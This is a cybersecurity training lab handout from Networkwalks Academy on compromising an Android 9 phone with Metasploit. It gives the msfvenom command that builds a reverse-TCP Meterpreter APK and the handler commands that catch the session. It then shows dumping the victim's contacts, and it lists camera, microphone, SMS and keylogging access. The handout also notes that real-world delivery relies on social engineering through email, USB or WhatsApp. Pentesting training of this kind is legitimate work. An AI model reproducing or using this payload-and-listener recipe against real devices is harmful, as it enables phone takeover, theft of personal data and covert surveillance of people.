LAB 1 (Download & view android phone contacts of Victim)

HACKING ANDROID 9
VULNERABILITY EXPLOITATION WITH
METASPLOIT

CYBERSECURITY PRACTICE LAB

Cyber Security Training Networkwalks Academy www.networkwalks.com

www.networkwalks.com
 PRACTICE LAB
HACKING Android 9
Vulnerability exploitation with Metasploit MSF

LAB 1 (Download & view android phone contacts of Victim)

TASKS

TASK1. Hack an Android mobile using Metasploit through Meterpreter

Reverse TCP payload & gain the Meterpreter shell access.

TASK2. Run sysinfo command to find the system information through shell
access & find the android version of victim’s phone.

TASK3. Download & view the phone contacts of victim.

www.networkwalks.com
 BACKGROUND: There are different ways to hack an Android Mobile Phone device. In this lab, we will focus
on Metasploit & MSFvenom. We will generate a malicious APK App file which will be installed on the target
android device. We will use Metasploit console to set up a listener which will be used to interact with the
device through the malicious APK installed. An attacker needs to do some social engineering to install APK
on the victim’s mobile device.

Follow the Lab setup guide PDF & step-by-step video guide to setup your virtual lab
for this lab practice. All settings, configurations & IP Addresses have been explained
in the PDF guide. Please contact your course admin if any difficulty.

SOLUTION

TASK1
Step1. Scan your network subnet through N-map & identify your target.
In this lab, the target is Android device with IP 10.0.0.9 /24. Note:
Follow the Nmap lab to
scan your relevant
network.

Step2. Start postgresql service:

www.networkwalks.com
Step3. Generate payload with MSFVenom:

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.2

LPORT=8888 > Desktop/VIRUS_PL_Android_revTCP_raw.apk

Here Payload type is meterpreter/reverse_tcp, LHOST IP address is 10.0.0.2 (Kali Linux Attacker
Server IP), LPORT is 8888 and output APK file name will be:
VIRUS_PL_Android_revTCP_raw.apk

www.networkwalks.com
Step4. The payload will be saved on your desktop, as shown below:

To avoid security issues on main PC, we can zip the file before transferring to victim (Optional):

Step5. Upload the malicious Virus file on Server through Google Drive:

Note:
For this lab practice,
we will use Google
Drive to transfer the
payload to victim OR
by simple copy/paste.
But in real world
practice, we transfer
the payload through
email, usb, whatsapp
or any other means
to the victim.

www.networkwalks.com
Step6. Download the malicious VIRUS file on victim Android:

Step7. Click on open after downloading the malicious VIRUS File:

www.networkwalks.com
Step8. Allow required settings permissions for APK installation:

Step9. Turn it ON & click on back arrow:

www.networkwalks.com
Step10. Click NEXT & INSTALL:

www.networkwalks.com
Step11. Click INSTALL ANYWAY:

Step12. Click on DONE.

www.networkwalks.com
Step13. Start MSFConsole on Attacker Kali Linux Server:

Step14. Start the listener on Attacker Kali Linux Server through these commands:

$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.2
msf6 exploit(multi/handler) > set LPORT 8888
msf6 exploit(multi/handler) > exploit

www.networkwalks.com
Step15. Go to Apps in Android & you will find new App will be installed there:

Step16. Open the newly installed App:

Step17. As soon as the victim opens the newly installed malicious app on android, a
Meterpreter session is created:

This means that:

Android phone has been hacked now!

www.networkwalks.com
Now the hacker has full control of the android phone. He can perform any operation
on this android phone for example:

❑ Open any application like whatsapp or settings etc

❑ See phone contacts & copy them
❑ See the list of installed Apps
❑ Check IP address settings
❑ Browse directories & files
❑ See running processes list
❑ Check system detail for further attacks
❑ Read & send sms & copy them out
❑ Listen to microphone
❑ Turn on front camera & watch HACKED
Let’s see some of these examples now.

TASK2
Step1. Run below command to check the android version of victim’s phone & basic
information:
$ meterpreter > sysinfo

www.networkwalks.com
TASK3
Step1. Run below command to download & view the phone contacts of victim:
$ meterpreter > dump_contacts

Step2. Go to user’s home directory (/home/kali) & you will find the contacts dump there:

www.networkwalks.com
 EXTRA REFERENCES & TIPS

• METASPLOIT FRAMEWORK (MSF) is a collection of very powerful Cybersecurity &

Pentesting tools.

• As shown in this lab, we can also explore various other options with Metasploit
including:

✓ View Webcam
✓ Listen to the Microphone
✓ Remote Desktop (Desktop VNC)
✓ Log Keystrokes
✓ Escalate Privileges (to steal tokens etc)

• Metasploit is used to create payloads.

• Metasploit is an open-source & its Community/FW version is free to use.

• Metasploit is an essential tool for both attackers and defenders.

• Metasploit comes pre-installed in the Kali Linux operating system.

• Metasploit was created by H. D. Moore in 2003 using Perl. Then, in 2007, it was
rewritten in Ruby. In 2009, it was bought by Rapid7 & it is currently owned by Rapid7.

• Metasploit currently has around 600 payloads (Meterpreter, CommandShell, ..)

• Metasploit currently has around 2000 exploits (for Windows, Android, Linux, …).

There are few options that are not supported on Android emulator but they work fine on
physical android phone. For example, watch front camera of victim’s phone , listen to
microphone of victim’s phone, record keystrokes, remote screenshare etc.

www.networkwalks.com
 © All Rights are reserved, Networkwalks Academy
Contact us for your Cybersecurity, Cisco CCNA, Linux, Python Programming & IT Training today [email protected]
Your Technical Questions, comments & suggestions are always welcomed.

www.networkwalks.com